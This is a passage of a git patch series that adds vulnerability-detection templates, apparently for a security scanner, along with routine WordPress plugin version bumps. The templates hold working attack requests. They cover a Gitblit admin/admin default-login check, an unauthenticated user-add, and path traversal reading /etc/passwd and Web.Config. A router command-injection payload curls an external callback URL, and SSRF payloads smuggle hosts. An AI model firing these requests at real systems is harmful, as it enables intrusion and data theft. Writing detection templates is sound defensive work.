    ' + condition: and + + - type: status + status: + - 200 From 8a0f8cad101c774d03040076b42fa61afa2fe756 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 18 Jul 2024 00:10:40 +0530 Subject: [PATCH 1337/1841] Create gitblit-default-login.yaml --- .../default-logins/gitblit-default-login.yaml | 47 +++++++++++++++++++ 1 file changed, 47 insertions(+) create mode 100644 http/default-logins/gitblit-default-login.yaml diff --git a/http/default-logins/gitblit-default-login.yaml b/http/default-logins/gitblit-default-login.yaml new file mode 100644 index 0000000000..627dc43cb4 --- /dev/null +++ b/http/default-logins/gitblit-default-login.yaml @@ -0,0 +1,47 @@ +id: gitblit-default-login + +info: + name: Gitblit - Default Login + author: ritikchaddha + severity: high + description: Gitblit Default login credentials were discovered. + reference: + - https://www.gitblit.com/administration.html + metadata: + max-request: 1 + verified: true + shodan-query: title:"Gitblit" + tags: gitblit,misconfig,default-login + +http: + - raw: + - | + POST /?wicket:interface=:0:userPanel:loginForm::IFormSubmitListener:: HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + wicket%3AbookmarkablePage=%3Acom.gitblit.wicket.pages.MyDashboardPage&id1_hf_0=&username={{username}}&password={{password}} + + payloads: + username: + - admin + password: + - admin + attack: pitchfork + + matchers-condition: and + matchers: + - type: word + part: set_cookie + words: + - "JSESSIONID=" + - "Gitblit=" + condition: and + + - type: status + status: + - 302 + + - type: dsl + dsl: + - "len(body) == 0" From 7e6ae3922811e1a706501d122e691735c5058847 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 18 Jul 2024 00:27:54 +0530 Subject: [PATCH 1338/1841] lint -fix --- http/default-logins/gitblit-default-login.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/default-logins/gitblit-default-login.yaml b/http/default-logins/gitblit-default-login.yaml index 627dc43cb4..99de815a05 100644 --- a/http/default-logins/gitblit-default-login.yaml +++ b/http/default-logins/gitblit-default-login.yaml @@ -4,7 +4,7 @@ info: name: Gitblit - Default Login author: ritikchaddha severity: high - description: Gitblit Default login credentials were discovered. + description: Gitblit Default login credentials were discovered. reference: - https://www.gitblit.com/administration.html metadata: From 29a72c9cc69b7f614d070a7bfc4f2164aedeec57 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 18 Jul 2024 00:28:34 +0530 Subject: [PATCH 1339/1841] Create CNVD-2023-72138 --- http/cnvd/2023/CNVD-2023-72138 | 34 ++++++++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 http/cnvd/2023/CNVD-2023-72138 diff --git a/http/cnvd/2023/CNVD-2023-72138 b/http/cnvd/2023/CNVD-2023-72138 new file mode 100644 index 0000000000..ac7bc597d5 --- /dev/null +++ b/http/cnvd/2023/CNVD-2023-72138 @@ -0,0 +1,34 @@ +id: CNVD-2023-72138 + +info: + name: LiveGBS user/save - Logical Flaw + author: pussycat0x + severity: high + description: | + There is a logic defect vulnerability in LiveGBS user/save. Unauthenticated attackers can exploit this vulnerability to arbitrarily add users, resulting in the takeover of background services and causing adverse effects such as information leakage. + reference: + - https://github.com/wy876/POC/blob/main/LiveGBS%E5%AD%98%E5%9C%A8%E9%80%BB%E8%BE%91%E7%BC%BA%E9%99%B7%E6%BC%8F%E6%B4%9E(CNVD-2023-72138).md + metadata: + fofa-query: icon_hash="-206100324" + tags: lvs,lfi,misconfig + +variables: + user: "{{to_lower(rand_base(5))}}" + +http: + - method: GET + path: + - "{{BaseURL}}/api/v1/user/save?ID=&Username={{user}}&Role=管理员&Enable=true" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"DefaultUserPassword": "12345678"' + - 'ID' + condition: and + + - type: status + status: + - 200 From 7bbc540a1d9ab2ef3fadf3c3e3bca3badc839b44 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 18 Jul 2024 00:31:49 +0530 Subject: [PATCH 1340/1841] Create lvs-download-lfi.yaml --- .../other/lvs-download-lfi.yaml | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 http/vulnerabilities/other/lvs-download-lfi.yaml diff --git a/http/vulnerabilities/other/lvs-download-lfi.yaml b/http/vulnerabilities/other/lvs-download-lfi.yaml new file mode 100644 index 0000000000..0a129edb31 --- /dev/null +++ b/http/vulnerabilities/other/lvs-download-lfi.yaml @@ -0,0 +1,33 @@ +id: lvs-download-lfi + +info: + name: LVS DownLoad.aspx - LFI + author: pussycat0x + severity: high + description: | + LVS lean value management system DownLoad.aspx has an arbitrary file reading vulnerability. + reference: + - https://github.com/wy876/POC/blob/main/LVS%E7%B2%BE%E7%9B%8A%E4%BB%B7%E5%80%BC%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9FDownLoad.aspx%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md#lvs%E7%B2%BE%E7%9B%8A%E4%BB%B7%E5%80%BC%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9Fdownloadaspx%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E + metadata: + verified: true + fofa-query: body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx" + tags: lvs,lfi + +http: + - method: GET + path: + - "{{BaseURL}}/Business/DownLoad.aspx?p=UploadFile/../Web.Config" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + - '' + - ' Date: Thu, 18 Jul 2024 00:34:21 +0530 Subject: [PATCH 1341/1841] Create ncast-lfi.yaml --- http/vulnerabilities/other/ncast-lfi.yaml | 28 +++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 http/vulnerabilities/other/ncast-lfi.yaml diff --git a/http/vulnerabilities/other/ncast-lfi.yaml b/http/vulnerabilities/other/ncast-lfi.yaml new file mode 100644 index 0000000000..2c9a9cc8da --- /dev/null +++ b/http/vulnerabilities/other/ncast-lfi.yaml @@ -0,0 +1,28 @@ +id: ncast-lfi + +info: + name: Ncast HD Intelligent - LFI + author: pussycat0x + severity: high + description: | + Ncast HD intelligent recording and broadcasting system has an arbitrary file reading vulnerability. + reference: + - https://github.com/wy876/POC/blob/main/Ncast%E9%AB%98%E6%B8%85%E6%99%BA%E8%83%BD%E5%BD%95%E6%92%AD%E7%B3%BB%E7%BB%9F%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md + metadata: + fofa-query: app="Ncast-产品" && title=="高清智能录播系统" + tags: ncast,lfi,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}/developLog/downloadLog.php?name=../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 From b4c632ac5ac6a8ef7b9055ee837957b0a8195ef8 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 18 Jul 2024 00:36:00 +0530 Subject: [PATCH 1342/1841] Create wifisky7-rce.yaml --- http/vulnerabilities/other/wifisky7-rce.yaml | 29 ++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 http/vulnerabilities/other/wifisky7-rce.yaml diff --git a/http/vulnerabilities/other/wifisky7-rce.yaml b/http/vulnerabilities/other/wifisky7-rce.yaml new file mode 100644 index 0000000000..064023652a --- /dev/null +++ b/http/vulnerabilities/other/wifisky7-rce.yaml @@ -0,0 +1,29 @@ +id: wifisky7-rce + +info: + name: WIFISKY-7 layer flow control router confirm.php - Remote Code Execution + author: pussycat0x + severity: high + description: | + There is an RCE vulnerability in the confirm.php interface of WIFISKY-7 layer flow control router + reference: + - https://github.com/wy876/POC/blob/main/WIFISKY-7%E5%B1%82%E6%B5%81%E6%8E%A7%E8%B7%AF%E7%94%B1%E5%99%A8confirm.php%E6%8E%A5%E5%8F%A3%E5%A4%84%E5%AD%98%E5%9C%A8RCE%E6%BC%8F%E6%B4%9E.md + metadata: + fofa-query: title="WIFISKY 7层流控路由器" + tags: wifisky,rce + +http: + - method: GET + path: + - "{{BaseURL}}/notice/confirm.php?t=;curl+http%3A%2F%2F{{interactsh-url}}" + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + + - type: status + status: + - 200 From f473336e3475e7a5ea329062387c9168d5f9a766 Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Thu, 18 Jul 2024 00:04:41 +0330 Subject: [PATCH 1343/1841] Improve blind-ssrf.yaml --- dast/vulnerabilities/ssrf/blind-ssrf.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/dast/vulnerabilities/ssrf/blind-ssrf.yaml b/dast/vulnerabilities/ssrf/blind-ssrf.yaml index 71389958fd..67b08db9e5 100644 --- a/dast/vulnerabilities/ssrf/blind-ssrf.yaml +++ b/dast/vulnerabilities/ssrf/blind-ssrf.yaml @@ -2,7 +2,7 @@ id: blind-ssrf info: name: Blind SSRF OAST Detection - author: pdteam + author: pdteam,AmirHossein Raeisi severity: medium metadata: max-request: 3 @@ -19,6 +19,8 @@ http: - "{{interactsh-url}}" - "{{FQDN}}.{{interactsh-url}}" - "{{RDN}}.{{interactsh-url}}" + - "{{FQDN}}@{{interactsh-url}}" + - "{{RDN}}@{{interactsh-url}}" fuzzing: - part: query @@ -41,4 +43,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 490a00463044022043639a2b3d837698f0ad1d5c78b81a92dc67cfe8ea18afeb57f006cf44e2803902204a61e6eeb0c529913899c9f8aae306dbddcac78f5f41837679b8ba15ada3b5db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022043639a2b3d837698f0ad1d5c78b81a92dc67cfe8ea18afeb57f006cf44e2803902204a61e6eeb0c529913899c9f8aae306dbddcac78f5f41837679b8ba15ada3b5db:922c64590222798bb761d5b6d8e72950 From ee6f77889f660883ecfeccaf9a06ccf51f02d431 Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Thu, 18 Jul 2024 00:30:07 +0330 Subject: [PATCH 1344/1841] Update blind-ssrf.yaml --- dast/vulnerabilities/ssrf/blind-ssrf.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/dast/vulnerabilities/ssrf/blind-ssrf.yaml b/dast/vulnerabilities/ssrf/blind-ssrf.yaml index 67b08db9e5..da3b1c31ab 100644 --- a/dast/vulnerabilities/ssrf/blind-ssrf.yaml +++ b/dast/vulnerabilities/ssrf/blind-ssrf.yaml @@ -20,7 +20,7 @@ http: - "{{FQDN}}.{{interactsh-url}}" - "{{RDN}}.{{interactsh-url}}" - "{{FQDN}}@{{interactsh-url}}" - - "{{RDN}}@{{interactsh-url}}" + - "{{RDN}}@{{interactsh-url}}" fuzzing: - part: query From 2b036079d3584ae2d0fcbd36645ebdeedbb61ad5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 18 Jul 2024 00:19:46 +0000 Subject: [PATCH 1345/1841] Auto WordPress Plugins Update [Thu Jul 18 00:19:46 UTC 2024] :robot: --- helpers/wordpress/plugins/broken-link-checker.txt | 2 +- helpers/wordpress/plugins/contact-form-7.txt | 2 +- helpers/wordpress/plugins/copy-delete-posts.txt | 2 +- helpers/wordpress/plugins/gutenberg.txt | 2 +- helpers/wordpress/plugins/host-webfonts-local.txt | 2 +- helpers/wordpress/plugins/insert-headers-and-footers.txt | 2 +- helpers/wordpress/plugins/mailchimp-for-wp.txt | 2 +- helpers/wordpress/plugins/malcare-security.txt | 2 +- helpers/wordpress/plugins/meta-box.txt | 2 +- helpers/wordpress/plugins/newsletter.txt | 2 +- helpers/wordpress/plugins/sg-security.txt | 2 +- helpers/wordpress/plugins/wp-mail-smtp.txt | 2 +- helpers/wordpress/plugins/wp-super-cache.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 1 - http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 - http/technologies/wordpress/plugins/chaty.yaml | 1 - .../wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 1 - http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 - http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 - .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 - http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../wordpress/plugins/google-sitemap-generator.yaml | 1 - http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/hostinger.yaml | 1 - http/technologies/wordpress/plugins/image-optimization.yaml | 1 - http/technologies/wordpress/plugins/imagify.yaml | 1 - http/technologies/wordpress/plugins/imsanity.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 1 - http/technologies/wordpress/plugins/metform.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 1 - http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 1 - .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 1 - http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 - http/technologies/wordpress/plugins/sg-security.yaml | 1 - http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/simple-history.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/templately.yaml | 1 - http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - .../technologies/wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 1 - http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../wordpress/plugins/widget-importer-exporter.yaml | 1 - .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 - .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-crontrol.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 - http/technologies/wordpress/plugins/wp-rollback.yaml | 1 - http/technologies/wordpress/plugins/wp-seopress.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 - http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 213 files changed, 13 insertions(+), 213 deletions(-) diff --git a/helpers/wordpress/plugins/broken-link-checker.txt b/helpers/wordpress/plugins/broken-link-checker.txt index 047615559c..cc6612c36e 100644 --- a/helpers/wordpress/plugins/broken-link-checker.txt +++ b/helpers/wordpress/plugins/broken-link-checker.txt @@ -1 +1 @@ -2.2.4 \ No newline at end of file +2.3.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/contact-form-7.txt b/helpers/wordpress/plugins/contact-form-7.txt index 554960d317..2054231b6a 100644 --- a/helpers/wordpress/plugins/contact-form-7.txt +++ b/helpers/wordpress/plugins/contact-form-7.txt @@ -1 +1 @@ -5.9.6 \ No newline at end of file +5.9.7 \ No newline at end of file diff --git a/helpers/wordpress/plugins/copy-delete-posts.txt b/helpers/wordpress/plugins/copy-delete-posts.txt index 7b5753f55b..b000a6a063 100644 --- a/helpers/wordpress/plugins/copy-delete-posts.txt +++ b/helpers/wordpress/plugins/copy-delete-posts.txt @@ -1 +1 @@ -1.4.6 \ No newline at end of file +1.4.7 \ No newline at end of file diff --git a/helpers/wordpress/plugins/gutenberg.txt b/helpers/wordpress/plugins/gutenberg.txt index d61eff48a6..6238d6cf77 100644 --- a/helpers/wordpress/plugins/gutenberg.txt +++ b/helpers/wordpress/plugins/gutenberg.txt @@ -1 +1 @@ -18.7.1 \ No newline at end of file +18.8.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/host-webfonts-local.txt b/helpers/wordpress/plugins/host-webfonts-local.txt index cf51361190..92666713cf 100644 --- a/helpers/wordpress/plugins/host-webfonts-local.txt +++ b/helpers/wordpress/plugins/host-webfonts-local.txt @@ -1 +1 @@ -5.9.0 \ No newline at end of file +5.9.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/insert-headers-and-footers.txt b/helpers/wordpress/plugins/insert-headers-and-footers.txt index 2922dcceba..e3a4f19336 100644 --- a/helpers/wordpress/plugins/insert-headers-and-footers.txt +++ b/helpers/wordpress/plugins/insert-headers-and-footers.txt @@ -1 +1 @@ -2.1.14 \ No newline at end of file +2.2.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/mailchimp-for-wp.txt b/helpers/wordpress/plugins/mailchimp-for-wp.txt index b1a07f71b5..8fb1d7b1f9 100644 --- a/helpers/wordpress/plugins/mailchimp-for-wp.txt +++ b/helpers/wordpress/plugins/mailchimp-for-wp.txt @@ -1 +1 @@ -4.9.13 \ No newline at end of file +4.9.14 \ No newline at end of file diff --git a/helpers/wordpress/plugins/malcare-security.txt b/helpers/wordpress/plugins/malcare-security.txt index cf419b2f6f..c27f11cab7 100644 --- a/helpers/wordpress/plugins/malcare-security.txt +++ b/helpers/wordpress/plugins/malcare-security.txt @@ -1 +1 @@ -5.56 \ No newline at end of file +5.65 \ No newline at end of file diff --git a/helpers/wordpress/plugins/meta-box.txt b/helpers/wordpress/plugins/meta-box.txt index c55621169c..242cf2faa8 100644 --- a/helpers/wordpress/plugins/meta-box.txt +++ b/helpers/wordpress/plugins/meta-box.txt @@ -1 +1 @@ -5.9.10 \ No newline at end of file +5.9.11 \ No newline at end of file diff --git a/helpers/wordpress/plugins/newsletter.txt b/helpers/wordpress/plugins/newsletter.txt index 007f2e63cd..6d5aa1b9a0 100644 --- a/helpers/wordpress/plugins/newsletter.txt +++ b/helpers/wordpress/plugins/newsletter.txt @@ -1 +1 @@ -8.4.5 \ No newline at end of file +8.4.7 \ No newline at end of file diff --git a/helpers/wordpress/plugins/sg-security.txt b/helpers/wordpress/plugins/sg-security.txt index 3e1ad720b1..8e03717dca 100644 --- a/helpers/wordpress/plugins/sg-security.txt +++ b/helpers/wordpress/plugins/sg-security.txt @@ -1 +1 @@ -1.5.0 \ No newline at end of file +1.5.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-mail-smtp.txt b/helpers/wordpress/plugins/wp-mail-smtp.txt index cc868b62c3..99eba4de93 100644 --- a/helpers/wordpress/plugins/wp-mail-smtp.txt +++ b/helpers/wordpress/plugins/wp-mail-smtp.txt @@ -1 +1 @@ -4.0.1 \ No newline at end of file +4.1.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-super-cache.txt b/helpers/wordpress/plugins/wp-super-cache.txt index c56eaaaf45..44fdbc3aa3 100644 --- a/helpers/wordpress/plugins/wp-super-cache.txt +++ b/helpers/wordpress/plugins/wp-super-cache.txt @@ -1 +1 @@ -1.12.3 \ No newline at end of file +1.12.4 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 7c04b2158c..3fd2256749 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008fc666c1ec15a39c9ce9de9649b39b963f931d967ca3ce3ffeae9187eea3f4b0022100c4f8cf8263caf29a117d07020353ff33322e803a72231a22252cafd0d4b1c6ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 